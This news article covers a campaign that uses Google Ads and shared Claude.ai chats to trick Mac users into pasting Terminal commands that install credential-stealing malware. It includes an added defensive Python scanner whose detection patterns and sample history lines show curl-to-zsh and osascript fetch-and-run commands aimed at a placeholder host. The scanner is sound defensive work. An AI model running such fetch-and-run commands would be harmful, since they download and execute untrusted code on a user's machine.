Hackers abuse Google ads, Claude.ai chats to push Mac malware

TL;DR

Hackers are abusing Google Ads and legitimate Claude.ai shared chats to push malware onto Mac computers. Researchers have identified malicious instructions embedded in shared chats that lead users to download and execute malware, with ongoing campaigns still active. This highlights new risks in AI platform security and ad-based malware distribution.

Cybercriminals are actively exploiting Google Ads and shared Claude.ai chat features to deliver malware to Mac users, with researchers confirming malicious instructions embedded in publicly accessible chats that lead to malware downloads.

Researchers from Trendyol Group and BleepingComputer have identified active campaigns where attackers use Google Ads to direct users searching for “Claude Mac download” to legitimate-looking Claude.ai pages. However, these pages host shared chat conversations containing social engineering schemes that instruct users to open Terminal and paste commands, resulting in silent malware downloads.

One such shared chat, attributed to “Apple Support,” guides users through opening Terminal and executing a command that fetches a base64-encoded shell script. This script runs in memory, avoiding detection, and checks for specific regional keyboard settings before proceeding. If the check passes, it collects system information, exfiltrates it, and downloads a second-stage payload executed via macOS’s osascript, giving attackers remote control.

In some variants, the script directly exfiltrates browser credentials, cookies, and Keychain data, indicating targeted information theft. The malware variants include a known macOS infostealer called MacSync, with some versions skipping fingerprinting and targeting credentials directly. Both campaigns use polymorphic payloads, making detection difficult based on static signatures.
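Because the payloads are polymorphic, triage is more reliable when it keys on the shape of the pasted command than on file hashes. The following is an added example, not code from the researchers or from the original article: a small scanner for zsh history that flags entries where fetched or base64-decoded content is handed straight to a shell or to osascript. The indicator names, the regexes and the sample history lines are assumptions constructed for illustration; the article does not publish the exact command.

```python
import re

# zsh EXTENDED_HISTORY entries look like ": <epoch>:<duration>;<command>"
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")
FETCH = re.compile(r"\b(?:curl|wget)\b")
# macOS base64 accepts -D/--decode; GNU base64 accepts -d/--decode
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
INTERP = r"(?:sh|bash|zsh|osascript)\b"
# Output of a pipeline stage fed to an interpreter on stdin
PIPE_TO_INTERP = re.compile(r"\|\s*(?:/usr/bin/|/bin/)?" + INTERP)
# Interpreter given a command substitution as its script text
SUBST_TO_INTERP = re.compile(r"(?<![\w.-])" + INTERP + r"\s+(?:-c|-e)\s+[\"']?\$\(")

def classify(command):
    """Return the behavioural indicators found in one command line."""
    hits = []
    fed = PIPE_TO_INTERP.search(command) or SUBST_TO_INTERP.search(command)
    if not fed:
        return hits  # nothing is executed from a stream, so not this pattern
    if FETCH.search(command):
        hits.append("remote-content-to-interpreter")
    if B64_DECODE.search(command):
        hits.append("base64-decoded-to-interpreter")
    if "osascript" in fed.group(0):
        hits.append("osascript-from-stream")
    return hits

def scan_history(lines):
    """Return (line_number, command, indicators) for each suspicious entry."""
    findings = []
    for number, raw in enumerate(lines, 1):
        command = ZSH_PREFIX.sub("", raw.strip())
        hits = classify(command)
        if hits:
            findings.append((number, command, hits))
    return findings

# Constructed sample history; example.invalid is a reserved placeholder domain.
SAMPLE = [
    ": 1700000000:0;brew install jq",
    ": 1700000100:0;curl -fsSL https://example.invalid/a | base64 -D | zsh",
    ": 1700000200:0;echo aGVsbG8= | base64 --decode",
    ": 1700000300:0;curl -O https://example.invalid/tool.dmg",
    ": 1700000400:0;curl -s https://example.invalid/b | osascript",
    'bash -c "$(curl -fsSL https://example.invalid/c)"',
]

if __name__ == "__main__":
    for number, command, hits in scan_history(SAMPLE):
        print(number, hits, command)
```

Some legitimate installers, Homebrew's included, use the same `bash -c "$(curl ...)"` shape, so a hit is a prompt to check the destination host and what ran afterwards, not a verdict.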

Why It Matters

This development underscores the evolving threat landscape where AI platforms and legitimate advertising channels are exploited for malware distribution. The use of shared chats on AI platforms like Claude.ai, combined with malvertising, presents new challenges for cybersecurity defenses and highlights the importance of cautious behavior when executing terminal commands from unverified sources. For Mac users, this campaign demonstrates that even trusted AI tools can be weaponized, emphasizing the need for vigilance and direct downloads from official sources.

Background

Malvertising campaigns have long been used to distribute malware, often via fake or compromised websites. Recent reports have shown attackers exploiting popular search engines and advertising platforms to redirect users to malicious sites. AI platforms like ChatGPT and Grok have previously been targeted for similar campaigns. This campaign marks a notable escalation by embedding malicious instructions directly within shared chat features on Claude.ai, a prominent AI service, leveraging its legitimate infrastructure for malicious purposes.

“We found shared Claude chats that contain social engineering instructions prompting users to paste commands into Terminal, which then silently downloads and runs malware on their Mac.”

— BleepingComputer researcher

“The malicious chats are hosted on publicly accessible links, and they use sophisticated techniques like polymorphic payloads to evade detection.”

— Trendyol security engineer Berk Albayrak

What Remains Unclear

It remains unclear how widespread the campaign is, whether additional variants exist, or if other AI platforms are similarly targeted. The full scope of affected users and the exact methods used for initial infection via Google Ads are still being investigated.

What’s Next

Security researchers plan to monitor ongoing campaigns, analyze new variants, and work with Google and AI platform providers to block malicious ads and shared chat links. Users are advised to avoid executing terminal commands from unverified sources and to download software only from official channels.

Key Questions

How can I avoid falling victim to this malware campaign?

Always verify the source before executing terminal commands, avoid clicking on suspicious ads, and download software only from official websites or app stores.

Is my Mac at risk if I visited a malicious Claude.ai chat?

If you followed instructions to paste commands into Terminal from a shared chat, your system could be compromised. It is recommended to run security scans and review system activity.

How are attackers using Google Ads in this campaign?

They are creating sponsored search results that appear to link to legitimate Claude.ai pages but instead direct users to shared chat links containing malicious instructions.

Will this affect non-Mac users?

This specific campaign targets Mac users with malware designed for macOS. However, similar tactics could be adapted for other platforms.
